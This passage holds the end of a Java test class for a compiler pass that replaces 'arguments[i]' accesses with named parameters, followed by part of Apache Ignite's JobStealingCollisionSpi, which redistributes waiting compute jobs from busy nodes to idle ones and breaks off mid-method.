         "function f() { function b(x,p0) { p0 }}");

    test("function f( ) { function b(x) { } arguments[0] }",
         "function f(p0) { function b(x) { } p0 }");

    test("function f( ) { arguments[0]; function b(x ) { arguments[1] }}",
         "function f(p1) { p1; function b(x,p0) { p0 }}");
  }

  public void testInnerFunctionsWithNamedArgumentInOutterFunction() {
    test("function f(x) { function b( ) { arguments[0] }}",
         "function f(x) { function b(p0) { p0 }}");

    test("function f(x ) { function b() { } arguments[1] }",
         "function f(x,p0) { function b() { } p0 }");

    test("function f(x ) { arguments[1]; function b( ) { arguments[0] }}",
         "function f(x,p1) { p1; function b(p0) { p0 }}");
  }

  public void testInnerFunctionsWithNamedArgumentInInnerAndOutterFunction() {
    test("function f(x) { function b(x ) { arguments[1] }}",
         "function f(x) { function b(x,p0) { p0 }}");

    test("function f(x ) { function b(x) { } arguments[1] }",
         "function f(x,p0) { function b(x) { } p0 }");

    test("function f(x ) { arguments[1]; function b(x ) { arguments[1] }}",
         "function f(x,p1) { p1; function b(x,p0) { p0 }}");
  }

  public void testInnerFunctionsAfterArguments() {
    // This caused a bug earlier due to incorrect push and pop of the arguments
    // access stack.
    test("function f( ) { arguments[0]; function b() { function c() { }} }",
         "function f(p0) { p0; function b() { function c() { }} }");
  }

  public void testNoOptimizationWhenGetProp() {
    testSame("function f() { arguments[0]; arguments.size }");
  }

  public void testNoOptimizationWhenIndexIsNotNumberConstant() {
    testSame("function f() { arguments[0]; arguments['callee'].length}");
    testSame("function f() { arguments[0]; arguments.callee.length}");
    testSame("function f() { arguments[0]; var x = 'callee'; arguments[x].length}");
  }

  public void testDecimalArgumentIndex() {
    testSame("function f() { arguments[0.5]; }");
  }

  // Arrow functions do not have their own arguments object, so references
  // inside an arrow belong to the enclosing vanilla function.

  public void testArrowFunctions() {

    // simple
    test(
        "function f() { ( ) => { alert(arguments[0]); } }",
        "function f(p0) { ( ) => { alert( p0); } }");

    // no var args
    testSame("function f() { (a,b,c) => alert(a + b + c); }");

    test(
        "function f() { (a,b,c) => alert(arguments[0]); }",
        "function f(p0) { (a,b,c) => alert( p0); }");

    // two var args
    test(
        "function f() { (a) => alert(arguments[1] + arguments[2]); }",
        "function f(p0,p1,p2) { (a) => alert( p1 + p2); }");

    // test with required params
    test(
        "function f() { (req0, var_args) => alert(req0 + arguments[1]); }",
        "function f(p0, p1) { (req0, var_args) => alert(req0 + p1); }");
  }

  public void testArrowFunctionIsInnerFunction() {

    test(
        "function f() { ( ) => { arguments[0] } }",
        "function f(p0) { ( ) => { p0 } }");

    // Arrow function after argument
    test(
        "function f( ) { arguments[0]; ( ) => { arguments[0] } }",
        "function f(p0) { p0; ( ) => { p0 } }");
  }

  public void testArrowFunctionDeclaration() {

    test(
        "function f() { var f = ( ) => { alert(arguments[0]); } }",
        "function f(p0) { var f = ( ) => { alert( p0); } }");
  }

  public void testNestedFunctions() {
    //Arrow inside arrow inside vanilla function

    test(
        "function f() { () => { () => { arguments[0]; } } }",
        "function f(p0) { () => { () => { p0; } } }");

    test(
        "function f() { () => { alert(arguments[0]); () => { arguments[0]; } } }",
        "function f(p0) { () => { alert( p0); () => { p0; } } }");

    test(
        "function f() { () => { alert(arguments[0]); () => { arguments[1]; } } }",
        "function f(p0, p1) { () => { alert( p0); () => { p1; } } }");
  }

  public void testNoOptimizationWhenArgumentIsUsedAsFunctionCall() {
    testSame("function f() {arguments[0]()}");
  }

  public void testUnusualArgumentsUsage() {
    testSame("function f(x) { x[arguments]; }");
  }

  public void testNegativeIndexNoCrash() {
    testSame("function badFunction() { arguments[-1]; }");
  }
}
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.ignite.spi.collision.jobstealing; import org.apache.ignite.*; import org.apache.ignite.cluster.*; import org.apache.ignite.compute.*; import org.apache.ignite.events.*; import org.apache.ignite.internal.managers.communication.*; import org.apache.ignite.internal.managers.eventstorage.*; import org.apache.ignite.internal.util.tostring.*; import org.apache.ignite.internal.util.typedef.*; import org.apache.ignite.internal.util.typedef.internal.*; import org.apache.ignite.resources.*; import org.apache.ignite.spi.*; import org.apache.ignite.spi.collision.*; import org.jdk8.backport.*; import java.io.*; import java.util.*; import java.util.Map.*; import java.util.concurrent.*; import java.util.concurrent.atomic.*; import static org.apache.ignite.events.EventType.*; /** * Collision SPI that supports job stealing from over-utilized nodes to * under-utilized nodes. This SPI is especially useful if you have * some jobs within task complete fast, and others sitting in the waiting * queue on slower nodes. In such case, the waiting jobs will be <b>stolen</b> * from slower node and moved to the fast under-utilized node. 
 * <p>
 * The design and ideas for this SPI are significantly influenced by
 * <a href="http://gee.cs.oswego.edu/dl/papers/fj.pdf">Java Fork/Join Framework</a>
 * authored by Doug Lea and planned for Java 7. {@code GridJobStealingCollisionSpi} took
 * similar concepts and applied them to the grid (as opposed to within VM support planned
 * in Java 7).
 * <p>
 * Quite often grids are deployed across many computers some of which will
 * always be more powerful than others. This SPI helps you avoid jobs being
 * stuck at a slower node, as they will be stolen by a faster node. In the following picture
 * when Node<sub>3</sub> becomes free, it steals Job<sub>13</sub> and Job<sub>23</sub>
 * from Node<sub>1</sub> and Node<sub>2</sub> respectively.
 * <p>
 * <center><img src="http://ignite.incubator.apache.org/images/job_stealing_white.gif"></center>
 * <p>
 * <i>
 * Note that this SPI must always be used in conjunction with
 * {@link org.apache.ignite.spi.failover.jobstealing.JobStealingFailoverSpi}.
 * Also note that job metrics update should be enabled in order for this SPI
 * to work properly (i.e. {@link org.apache.ignite.configuration.IgniteConfiguration#getMetricsUpdateFrequency()}
 * should be set to {@code 0} or greater value).
 * The responsibility of Job Stealing Failover SPI is to properly route <b>stolen</b>
 * jobs to the nodes that initially requested (<b>stole</b>) these jobs. The
 * SPI maintains a counter of how many times a job was stolen and
 * hence traveled to another node. {@code GridJobStealingCollisionSpi}
 * checks this counter and will not allow a job to be stolen if this counter
 * exceeds a certain threshold {@link JobStealingCollisionSpi#setMaximumStealingAttempts(int)}.
 * </i>
 * <p>
 * <h1 class="header">Configuration</h1>
 * In order to use this SPI, you should configure your grid instance
 * to use {@code GridJobStealingCollisionSpi} either from Spring XML file or
 * directly.
The following configuration parameters are supported:
 * <h2 class="header">Mandatory</h2>
 * This SPI has no mandatory configuration parameters.
 * <h2 class="header">Optional</h2>
 * The following configuration parameters are optional:
 * <ul>
 * <li>
 * Maximum number of active jobs that will be allowed by this SPI
 * to execute concurrently (see {@link #setActiveJobsThreshold(int)}).
 * </li>
 * <li>
 * Maximum number of waiting jobs. Once waiting queue size goes below
 * this number, this SPI will attempt to steal jobs from over-utilized
 * nodes by sending <b>"steal"</b> requests (see {@link #setWaitJobsThreshold(int)}).
 * </li>
 * <li>
 * Steal message expire time. If no response was received from a node
 * to which <b>steal</b> request was sent, then request will be considered
 * lost and will be resent, potentially to another node (see {@link #setMessageExpireTime(long)}).
 * </li>
 * <li>
 * Maximum number of stealing attempts for the job (see {@link #setMaximumStealingAttempts(int)}).
 * </li>
 * <li>
 * Whether stealing enabled or not (see {@link #setStealingEnabled(boolean)}).
 * </li>
 * <li>
 * Enables stealing to/from only nodes that have these attributes set
 * (see {@link #setStealingAttributes(Map)}).
 * </li>
 * </ul>
 * Below is example of configuring this SPI from Java code:
 * <pre name="code" class="java">
 * GridJobStealingCollisionSpi spi = new GridJobStealingCollisionSpi();
 *
 * // Configure number of waiting jobs
 * // in the queue for job stealing.
 * spi.setWaitJobsThreshold(10);
 *
 * // Configure message expire time (in milliseconds).
 * spi.setMessageExpireTime(500);
 *
 * // Configure stealing attempts number.
 * spi.setMaximumStealingAttempts(10);
 *
 * // Configure number of active jobs that are allowed to execute
 * // in parallel. This number should usually be equal to the number
 * // of threads in the pool (default is 100).
 * spi.setActiveJobsThreshold(50);
 *
 * // Enable stealing.
 * spi.setStealingEnabled(true);
 *
 * // Set stealing attribute to steal from/to nodes that have it.
 * spi.setStealingAttributes(Collections.singletonMap("node.segment", "foobar"));
 *
 * GridConfiguration cfg = new GridConfiguration();
 *
 * // Override default Collision SPI.
 * cfg.setCollisionSpi(spi);
 * </pre>
 * Here is an example of how this SPI can be configured from Spring XML configuration:
 * <pre name="code" class="xml">
 * &lt;property name="collisionSpi"&gt;
 * &lt;bean class="org.apache.ignite.spi.collision.jobstealing.GridJobStealingCollisionSpi"&gt;
 * &lt;property name="activeJobsThreshold" value="100"/&gt;
 * &lt;property name="waitJobsThreshold" value="0"/&gt;
 * &lt;property name="messageExpireTime" value="1000"/&gt;
 * &lt;property name="maximumStealingAttempts" value="10"/&gt;
 * &lt;property name="stealingEnabled" value="true"/&gt;
 * &lt;property name="stealingAttributes"&gt;
 * &lt;map&gt;
 * &lt;entry key="node.segment" value="foobar"/&gt;
 * &lt;/map&gt;
 * &lt;/property&gt;
 * &lt;/bean&gt;
 * &lt;/property&gt;
 * </pre>
 * <p>
 * <img src="http://ignite.incubator.apache.org/images/spring-small.png">
 * <br>
 * For information about Spring framework visit <a href="http://www.springframework.org/">www.springframework.org</a>
 */
@SuppressWarnings("SynchronizationOnLocalVariableOrMethodParameter")
@IgniteSpiMultipleInstancesSupport(true)
@IgniteSpiConsistencyChecked(optional = true)
public class JobStealingCollisionSpi extends IgniteSpiAdapter implements CollisionSpi,
    JobStealingCollisionSpiMBean {
    /** Maximum number of attempts to steal job by another node (default is {@code 5}). */
    public static final int DFLT_MAX_STEALING_ATTEMPTS = 5;

    /**
     * Default number of parallel jobs allowed (value is {@code 95} which is
     * slightly less same as default value of threads in the execution thread pool
     * to allow some extra threads for system processing).
     */
    public static final int DFLT_ACTIVE_JOBS_THRESHOLD = 95;

    /**
     * Default steal message expire time in milliseconds (value is {@code 1000}).
     * Once this time is elapsed and no response for steal message is received,
     * the message is considered lost and another steal message will be generated,
     * potentially to another node.
     */
    public static final long DFLT_MSG_EXPIRE_TIME = 1000;

    /**
     * Default threshold of waiting jobs. If number of waiting jobs exceeds this threshold,
     * then waiting jobs will become available to be stolen (value is {@code 0}).
     */
    public static final int DFLT_WAIT_JOBS_THRESHOLD = 0;

    /** Default start value for job priority (value is {@code 0}). */
    public static final int DFLT_JOB_PRIORITY = 0;

    /** Communication topic used for sending/receiving steal requests between nodes. */
    private static final String JOB_STEALING_COMM_TOPIC = "ignite.collision.job.stealing.topic";

    /** Job context attribute for storing thief node UUID (this attribute is used in job stealing failover SPI). */
    public static final String THIEF_NODE_ATTR = "ignite.collision.thief.node";

    /** Threshold of maximum jobs on waiting queue. */
    public static final String WAIT_JOBS_THRESHOLD_NODE_ATTR = "ignite.collision.wait.jobs.threshold";

    /** Threshold of maximum jobs executing concurrently. */
    public static final String ACTIVE_JOBS_THRESHOLD_NODE_ATTR = "ignite.collision.active.jobs.threshold";

    /**
     * Name of job context attribute containing current stealing attempt count.
     * This count is incremented every time the same job gets stolen for
     * execution.
     *
     * @see org.apache.ignite.compute.ComputeJobContext
     */
    public static final String STEALING_ATTEMPT_COUNT_ATTR = "ignite.stealing.attempt.count";

    /** Maximum stealing attempts attribute name. */
    public static final String MAX_STEALING_ATTEMPT_ATTR = "ignite.stealing.max.attempts";

    /** Stealing request expiration time attribute name. */
    public static final String MSG_EXPIRE_TIME_ATTR = "ignite.stealing.msg.expire.time";

    /** Stealing priority attribute name. */
    public static final String STEALING_PRIORITY_ATTR = "ignite.stealing.priority";

    /** Grid logger. */
    @SuppressWarnings({"FieldAccessedSynchronizedAndUnsynchronized"})
    @LoggerResource
    private IgniteLogger log;

    /** Number of jobs that can be executed in parallel. */
    private volatile int activeJobsThreshold = DFLT_ACTIVE_JOBS_THRESHOLD;

    /** Configuration parameter defining waiting job count threshold for stealing to start. */
    @SuppressWarnings("RedundantFieldInitialization")
    private volatile int waitJobsThreshold = DFLT_WAIT_JOBS_THRESHOLD;

    /** Message expire time configuration parameter. */
    private volatile long msgExpireTime = DFLT_MSG_EXPIRE_TIME;

    /** Maximum number of attempts to steal job by another node. */
    private volatile int maxStealingAttempts = DFLT_MAX_STEALING_ATTEMPTS;

    /** Flag indicating whether job stealing is enabled. */
    private volatile boolean isStealingEnabled = true;

    /** Steal attributes: when non-empty, stealing happens only to/from nodes carrying all of them. */
    @GridToStringInclude
    private Map<String, ? extends Serializable> stealAttrs;

    /** Number of jobs that were active last time. */
    private volatile int runningNum;

    /** Number of jobs that were waiting for execution last time. */
    private volatile int waitingNum;

    /** Number of currently held jobs. */
    private volatile int heldNum;

    /** Total number of stolen jobs. */
    private final AtomicInteger totalStolenJobsNum = new AtomicInteger();

    /** Map of sent messages, keyed by destination node ID. */
    private final ConcurrentMap<UUID, MessageInfo> sndMsgMap = new ConcurrentHashMap8<>();

    /** Map of received messages, keyed by sender node ID. */
    private final ConcurrentMap<UUID, MessageInfo> rcvMsgMap = new ConcurrentHashMap8<>();

    /** Queue of remote nodes considered as steal candidates (round-robined by checkIdle). */
    private final Queue<ClusterNode> nodeQueue = new ConcurrentLinkedDeque8<>();

    /** External collision listener, notified when a steal request arrives. */
    private CollisionExternalListener extLsnr;

    /** Discovery listener. */
    private GridLocalEventListener discoLsnr;

    /** Communication listener. */
    private GridMessageListener msgLsnr;

    /** Number of steal requests (sum of outstanding deltas from all requesting nodes). */
    private final AtomicInteger stealReqs = new AtomicInteger();

    /** Job priority comparator; lazily created by {@link #comparator()}. */
    private Comparator<CollisionJobContext> cmp;

    /** {@inheritDoc} */
    @IgniteSpiConfiguration(optional = true)
    @Override public void setActiveJobsThreshold(int activeJobsThreshold) {
        A.ensure(activeJobsThreshold >= 0, "activeJobsThreshold >= 0");

        this.activeJobsThreshold = activeJobsThreshold;
    }

    /** {@inheritDoc} */
    @Override public int getActiveJobsThreshold() {
        return activeJobsThreshold;
    }

    /** {@inheritDoc} */
    @IgniteSpiConfiguration(optional = true)
    @Override public void setWaitJobsThreshold(int waitJobsThreshold) {
        A.ensure(waitJobsThreshold >= 0, "waitJobsThreshold >= 0");

        this.waitJobsThreshold = waitJobsThreshold;
    }

    /** {@inheritDoc} */
    @Override public int getWaitJobsThreshold() {
        return waitJobsThreshold;
    }

    /** {@inheritDoc} */
    @IgniteSpiConfiguration(optional = true)
    @Override public void setMessageExpireTime(long msgExpireTime) {
        A.ensure(msgExpireTime > 0, "messageExpireTime > 0");

        this.msgExpireTime = msgExpireTime;
    }

    /** {@inheritDoc} */
    @Override public long getMessageExpireTime() {
        return msgExpireTime;
    }

    /** {@inheritDoc} */
    @IgniteSpiConfiguration(optional = true)
    @Override public void setStealingEnabled(boolean isStealingEnabled) {
        this.isStealingEnabled = isStealingEnabled;
    }

    /** {@inheritDoc} */
    @Override public boolean isStealingEnabled() {
        return isStealingEnabled;
    }

    /** {@inheritDoc} */
    @IgniteSpiConfiguration(optional = true)
    @Override public void setMaximumStealingAttempts(int maxStealingAttempts) {
        A.ensure(maxStealingAttempts > 0, "maxStealingAttempts > 0");

        this.maxStealingAttempts = maxStealingAttempts;
    }

    /** {@inheritDoc} */
    @Override public int getMaximumStealingAttempts() {
        return maxStealingAttempts;
    }

    /**
     * Configuration parameter to enable stealing to/from only nodes that
     * have these attributes set (see {@link org.apache.ignite.cluster.ClusterNode#attribute(String)} and
     * {@link org.apache.ignite.configuration.IgniteConfiguration#getUserAttributes()} methods).
     *
     * @param stealAttrs Node attributes to enable job stealing for.
     */
    @IgniteSpiConfiguration(optional = true)
    public void setStealingAttributes(Map<String, ? extends Serializable> stealAttrs) {
        this.stealAttrs = stealAttrs;
    }

    /** {@inheritDoc} */
    @Override public Map<String, ? extends Serializable> getStealingAttributes() {
        return stealAttrs;
    }

    /** {@inheritDoc} */
    @Override public int getCurrentRunningJobsNumber() {
        return runningNum;
    }

    /** {@inheritDoc} */
    @Override public int getCurrentHeldJobsNumber() {
        return heldNum;
    }

    /** {@inheritDoc} */
    @Override public int getCurrentWaitJobsNumber() {
        return waitingNum;
    }

    /** {@inheritDoc} */
    @Override public int getCurrentActiveJobsNumber() {
        return runningNum + heldNum;
    }

    /** {@inheritDoc} */
    @Override public int getTotalStolenJobsNumber() {
        return totalStolenJobsNum.get();
    }

    /** {@inheritDoc} */
    @Override public int getCurrentJobsToStealNumber() {
        return stealReqs.get();
    }

    /** {@inheritDoc} */
    @Override public Map<String, Object> getNodeAttributes() throws IgniteSpiException {
        // Published so that remote nodes can see this node's stealing configuration.
        return F.<String, Object>asMap(
            createSpiAttributeName(WAIT_JOBS_THRESHOLD_NODE_ATTR), waitJobsThreshold,
            createSpiAttributeName(ACTIVE_JOBS_THRESHOLD_NODE_ATTR), activeJobsThreshold,
            createSpiAttributeName(MAX_STEALING_ATTEMPT_ATTR), maxStealingAttempts,
            createSpiAttributeName(MSG_EXPIRE_TIME_ATTR), msgExpireTime);
    }

    /** {@inheritDoc} */
    @Override public void spiStart(String gridName) throws IgniteSpiException {
        assertParameter(activeJobsThreshold >= 0, "activeJobsThreshold >= 0");
        assertParameter(waitJobsThreshold >= 0, "waitJobsThreshold >= 0");
        assertParameter(msgExpireTime > 0, "messageExpireTime > 0");
        assertParameter(maxStealingAttempts > 0, "maxStealingAttempts > 0");

        // Start SPI start stopwatch.
        startStopwatch();

        // Ack parameters.
        if (log.isDebugEnabled()) {
            log.debug(configInfo("activeJobsThreshold", activeJobsThreshold));
            log.debug(configInfo("waitJobsThreshold", waitJobsThreshold));
            log.debug(configInfo("messageExpireTime", msgExpireTime));
            log.debug(configInfo("maxStealingAttempts", maxStealingAttempts));
        }

        registerMBean(gridName, this, JobStealingCollisionSpiMBean.class);

        // Ack start.
        if (log.isDebugEnabled())
            log.debug(startInfo());
    }

    /** {@inheritDoc} */
    @Override public void spiStop() throws IgniteSpiException {
        unregisterMBean();

        // Ack ok stop.
        if (log.isDebugEnabled())
            log.debug(stopInfo());
    }

    /** {@inheritDoc} */
    @Override public void setExternalCollisionListener(CollisionExternalListener extLsnr) {
        this.extLsnr = extLsnr;
    }

    /** {@inheritDoc} */
    @Override protected void onContextInitialized0(IgniteSpiContext spiCtx) throws IgniteSpiException {
        // Track topology changes to keep node queue and per-node message maps in sync.
        spiCtx.addLocalEventListener(
            discoLsnr = new GridLocalEventListener() {
                @SuppressWarnings("fallthrough")
                @Override public void onEvent(Event evt) {
                    assert evt instanceof DiscoveryEvent;

                    DiscoveryEvent discoEvt = (DiscoveryEvent)evt;

                    UUID evtNodeId = discoEvt.eventNode().id();

                    switch (discoEvt.type()) {
                        case EVT_NODE_JOINED:
                            ClusterNode node = getSpiContext().node(evtNodeId);

                            if (node != null) {
                                nodeQueue.offer(node);

                                sndMsgMap.putIfAbsent(node.id(), new MessageInfo());
                                rcvMsgMap.putIfAbsent(node.id(), new MessageInfo());
                            }

                            break;

                        case EVT_NODE_LEFT:
                        case EVT_NODE_FAILED:
                            Iterator<ClusterNode> iter = nodeQueue.iterator();

                            while (iter.hasNext()) {
                                ClusterNode nextNode = iter.next();

                                if (nextNode.id().equals(evtNodeId))
                                    iter.remove();
                            }

                            sndMsgMap.remove(evtNodeId);
                            rcvMsgMap.remove(evtNodeId);

                            break;

                        default:
                            assert false : "Unexpected event: " + evt;
                    }
                }
            },
            EVT_NODE_FAILED, EVT_NODE_JOINED, EVT_NODE_LEFT
        );

        // Seed maps/queue with nodes already in topology at context-initialization time.
        Collection<ClusterNode> rmtNodes = spiCtx.remoteNodes();

        for (ClusterNode node : rmtNodes) {
            UUID id = node.id();

            if (spiCtx.node(id) != null) {
                sndMsgMap.putIfAbsent(id, new MessageInfo());
                rcvMsgMap.putIfAbsent(id, new MessageInfo());

                // Check if node has concurrently left.
                if (spiCtx.node(id) == null) {
                    sndMsgMap.remove(id);
                    rcvMsgMap.remove(id);
                }
            }
        }

        nodeQueue.addAll(rmtNodes);

        // Drop queued nodes that left between the snapshot above and now.
        Iterator<ClusterNode> iter = nodeQueue.iterator();

        while (iter.hasNext()) {
            ClusterNode nextNode = iter.next();

            if (spiCtx.node(nextNode.id()) == null)
                iter.remove();
        }

        // Listen for incoming steal requests from other nodes.
        spiCtx.addMessageListener(
            msgLsnr = new GridMessageListener() {
                @Override public void onMessage(UUID nodeId, Object msg) {
                    MessageInfo info = rcvMsgMap.get(nodeId);

                    if (info == null) {
                        if (log.isDebugEnabled())
                            log.debug("Ignoring message steal request as discovery event has not yet been received " +
                                "for node: " + nodeId);

                        return;
                    }

                    int stealReqs0;

                    synchronized (info) {
                        JobStealingRequest req = (JobStealingRequest)msg;

                        // Increment total number of steal requests.
                        // Note that it is critical to increment total
                        // number of steal requests before resetting message info.
                        stealReqs0 = stealReqs.addAndGet(req.delta() - info.jobsToSteal());

                        info.reset(req.delta());
                    }

                    if (log.isDebugEnabled())
                        log.debug("Received steal request [nodeId=" + nodeId + ", msg=" + msg +
                            ", stealReqs=" + stealReqs0 + ']');

                    CollisionExternalListener tmp = extLsnr;

                    // Let grid know that collisions should be resolved.
                    if (tmp != null)
                        tmp.onExternalCollision();
                }
            }, JOB_STEALING_COMM_TOPIC);
    }

    /** {@inheritDoc} */
    @Override public void onContextDestroyed0() {
        if (discoLsnr != null)
            getSpiContext().removeLocalEventListener(discoLsnr);

        if (msgLsnr != null)
            getSpiContext().removeMessageListener(msgLsnr, JOB_STEALING_COMM_TOPIC);
    }

    /** {@inheritDoc} */
    @Override public void onCollision(CollisionContext ctx) {
        assert ctx != null;

        Collection<CollisionJobContext> activeJobs = ctx.activeJobs();
        Collection<CollisionJobContext> waitJobs = ctx.waitingJobs();

        heldNum = ctx.heldJobs().size();

        // Check if there are any jobs to activate or reject.
        int rejected = checkBusy(waitJobs, activeJobs);

        totalStolenJobsNum.addAndGet(rejected);

        // No point of stealing jobs if some jobs were rejected.
        if (rejected > 0) {
            if (log.isDebugEnabled())
                log.debug("Total count of rejected jobs: " + rejected);

            return;
        }

        if (isStealingEnabled)
            // Check if there are jobs to steal.
            checkIdle(waitJobs, activeJobs);
    }

    /**
     * Check if node is busy and activate/reject proper number of jobs.
     *
     * @param waitJobs Waiting jobs.
     * @param activeJobs Active jobs.
     * @return Number of rejected jobs.
     */
    private int checkBusy(Collection<CollisionJobContext> waitJobs, Collection<CollisionJobContext> activeJobs) {
        int activeSize = activeJobs.size();
        int waitSize = waitJobs.size();

        waitingNum = waitJobs.size();
        runningNum = activeSize;

        IgniteSpiContext ctx = getSpiContext();

        int activated = 0;
        int rejected = 0;

        Collection<CollisionJobContext> waitPriJobs = sortJobs(waitJobs, waitSize);

        int activeJobsThreshold0 = activeJobsThreshold;
        int waitJobsThreshold0 = waitJobsThreshold;

        for (CollisionJobContext waitCtx : waitPriJobs) {
            if (activeJobs.size() < activeJobsThreshold0) {
                activated++;

                // If job was activated/cancelled by another thread, then
                // this method is no-op.
                // We also need to make sure that job is not being rejected by another thread.
                synchronized (waitCtx.getJobContext()) {
                    waitCtx.activate();
                }
            }
            else if (stealReqs.get() > 0) {
                // Jobs explicitly marked as non-stealable are never rejected.
                if (waitCtx.getJob().getClass().isAnnotationPresent(JobStealingDisabled.class))
                    continue;

                // Collision count attribute.
                Integer stealingCnt = waitCtx.getJobContext().getAttribute(STEALING_ATTEMPT_COUNT_ATTR);

                // Check that maximum stealing attempt threshold
                // has not been exceeded.
                if (stealingCnt != null) {
                    // If job exceeded failover threshold, skip it.
                    if (stealingCnt >= maxStealingAttempts) {
                        if (log.isDebugEnabled())
                            log.debug("Waiting job exceeded stealing attempts and won't be rejected " +
                                "(will try other jobs on waiting list): " + waitCtx);

                        continue;
                    }
                }
                else
                    stealingCnt = 0;

                // Check if allowed to reject job.
                int jobsToReject = waitPriJobs.size() - activated - rejected - waitJobsThreshold0;

                if (log.isDebugEnabled())
                    log.debug("Jobs to reject count [jobsToReject=" + jobsToReject + ", waitCtx=" + waitCtx + ']');

                if (jobsToReject <= 0)
                    break;

                Integer pri = waitCtx.getJobContext().getAttribute(STEALING_PRIORITY_ATTR);

                if (pri == null)
                    pri = DFLT_JOB_PRIORITY;

                // If we have an excess of waiting jobs, reject as many as there are
                // requested to be stolen. Note, that we use lose total steal request
                // counter to prevent excessive iteration over nodes under load.
                for (Iterator<Entry<UUID, MessageInfo>> iter = rcvMsgMap.entrySet().iterator();
                    iter.hasNext() && stealReqs.get() > 0;) {
                    Entry<UUID, MessageInfo> entry = iter.next();

                    UUID nodeId = entry.getKey();

                    // Node has left topology.
                    if (ctx.node(nodeId) == null) {
                        iter.remove();

                        continue;
                    }

                    MessageInfo info = entry.getValue();

                    synchronized (info) {
                        int jobsAsked = info.jobsToSteal();

                        assert jobsAsked >= 0;

                        // Skip nodes that have not asked for jobs to steal.
                        if (jobsAsked == 0)
                            // Move to next node.
                            continue;

                        // If message is expired, ignore it.
                        if (info.expired()) {
                            // Subtract expired messages.
                            stealReqs.addAndGet(-info.jobsToSteal());

                            info.reset(0);

                            continue;
                        }

                        // Check that waiting job has thief node in topology.
                        boolean found = false;

                        for (UUID id : waitCtx.getTaskSession().getTopology()) {
                            if (id.equals(nodeId)) {
                                found = true;

                                break;
                            }
                        }

                        if (!found) {
                            if (log.isDebugEnabled())
                                log.debug("Thief node does not belong to task topology [thief=" + nodeId +
                                    ", task=" + waitCtx.getTaskSession() + ']');

                            continue;
                        }

                        if (stealReqs.get() <= 0)
                            break;

                        // Need to make sure that job is not being
                        // rejected by another thread.
                        synchronized (waitCtx.getJobContext()) {
                            boolean cancel = waitCtx.getJobContext().getAttribute(THIEF_NODE_ATTR) == null;

                            if (cancel) {
                                // Mark job as stolen.
                                waitCtx.getJobContext().setAttribute(THIEF_NODE_ATTR, nodeId);
                                waitCtx.getJobContext().setAttribute(STEALING_ATTEMPT_COUNT_ATTR, stealingCnt + 1);
                                waitCtx.getJobContext().setAttribute(STEALING_PRIORITY_ATTR, pri + 1);

                                if (log.isDebugEnabled())
                                    log.debug("Will try to reject job due to steal request [ctx=" + waitCtx +
                                        ", thief=" + nodeId + ']');

                                int i = stealReqs.decrementAndGet();

                                if (i >= 0 && waitCtx.cancel()) {
                                    rejected++;

                                    info.reset(jobsAsked - 1);

                                    if (log.isDebugEnabled())
                                        log.debug("Rejected job due to steal request [ctx=" + waitCtx +
                                            ", nodeId=" + nodeId + ']');
                                }
                                else {
                                    if (log.isDebugEnabled())
                                        log.debug("Failed to reject job [i=" + i + ']');

                                    // Cancellation failed - roll back the "stolen" markers and the counter.
                                    waitCtx.getJobContext().setAttribute(THIEF_NODE_ATTR, null);
                                    waitCtx.getJobContext().setAttribute(STEALING_ATTEMPT_COUNT_ATTR, stealingCnt);
                                    waitCtx.getJobContext().setAttribute(STEALING_PRIORITY_ATTR, pri);

                                    stealReqs.incrementAndGet();
                                }
                            }
                        }

                        // Move to next job.
                        break;
                    }
                }
            }
            else
                // No more jobs to steal or activate.
                break;
        }

        return rejected;
    }

    /**
     * Sort jobs by priority from high to lowest value.
     *
     * @param waitJobs Waiting jobs.
     * @param waitSize Snapshot size.
     * @return Sorted waiting jobs by priority.
     */
    private Collection<CollisionJobContext> sortJobs(Collection<CollisionJobContext> waitJobs, int waitSize) {
        List<CollisionJobContext> passiveList = new ArrayList<>(waitJobs.size());

        int i = 0;

        for (CollisionJobContext waitJob : waitJobs) {
            passiveList.add(waitJob);

            // Copy no more than the snapshot size taken by the caller.
            if (i++ == waitSize)
                break;
        }

        Collections.sort(passiveList, comparator());

        return passiveList;
    }

    /**
     * @return Comparator ordering jobs from highest to lowest priority (lazily created, cached in {@link #cmp}).
     */
    private Comparator<CollisionJobContext> comparator() {
        if (cmp == null) {
            cmp = new Comparator<CollisionJobContext>() {
                @Override public int compare(CollisionJobContext o1, CollisionJobContext o2) {
                    int p1 = getJobPriority(o1.getJobContext());
                    int p2 = getJobPriority(o2.getJobContext());

                    // Descending order: higher priority sorts first.
                    return p1 < p2 ? 1 : p1 == p2 ? 0 : -1;
                }
            };
        }

        return cmp;
    }

    /**
     * Gets job priority from task context. If job has no priority default one will be used.
     *
     * @param ctx Job context.
     * @return Job priority.
     */
    private int getJobPriority(ComputeJobContext ctx) {
        assert ctx != null;

        Integer p;

        try {
            p = ctx.getAttribute(STEALING_PRIORITY_ATTR);
        }
        catch (ClassCastException e) {
            // Attribute of an unexpected type - log and fall back to the default priority.
            U.error(log, "Type of job context priority attribute '" + STEALING_PRIORITY_ATTR +
                "' is not java.lang.Integer (will use default priority) [type=" +
                ctx.getAttribute(STEALING_PRIORITY_ATTR).getClass() + ", dfltPriority=" + DFLT_JOB_PRIORITY + ']', e);

            p = DFLT_JOB_PRIORITY;
        }

        if (p == null)
            p = DFLT_JOB_PRIORITY;

        return p;
    }

    /**
     * Check if the node is idle and steal as many jobs from other nodes
     * as possible.
     *
     * @param waitJobs Waiting jobs.
     * @param activeJobs Active jobs.
     */
    private void checkIdle(Collection<CollisionJobContext> waitJobs, Collection<CollisionJobContext> activeJobs) {
        // Check for overflow.
        int max = waitJobsThreshold + activeJobsThreshold;

        if (max < 0)
            max = Integer.MAX_VALUE;

        int jobsToSteal = max - (waitJobs.size() + activeJobs.size());

        if (log.isDebugEnabled())
            log.debug("Total number of jobs to be stolen: " + jobsToSteal);

        if (jobsToSteal > 0) {
            int jobsLeft = jobsToSteal;

            ClusterNode next;

            int nodeCnt = getSpiContext().remoteNodes().size();

            int idx = 0;

            // Round-robin over candidate nodes; visit each remote node at most once.
            while (jobsLeft > 0 && idx++ < nodeCnt && (next = nodeQueue.poll()) != null) {
                if (getSpiContext().node(next.id()) == null)
                    continue;

